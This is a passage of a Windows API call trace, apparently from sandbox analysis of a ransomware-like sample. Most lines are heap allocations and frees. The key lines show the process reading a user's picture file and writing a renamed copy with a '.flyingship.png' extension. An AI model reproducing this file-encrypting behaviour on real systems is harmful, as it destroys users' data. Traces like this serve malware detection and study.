lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.619] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.619] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.619] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0188.619] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghhl.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.621] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.621] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.624] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0188.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0188.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0188.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghhl.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0188.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0188.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.628] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0188.628] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0188.628] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0188.628] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0188.630] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0188.630] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0188.634] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4cae, lpOverlapped=0x0) returned 1 [0188.634] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0188.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14cae) returned 0xbea018 [0188.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0188.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0188.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14cae) returned 0xa5f008 [0188.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14cae) returned 0xbea018 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0188.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.640] RtlAllocateHeap (HeapHandle=0x8a0000, 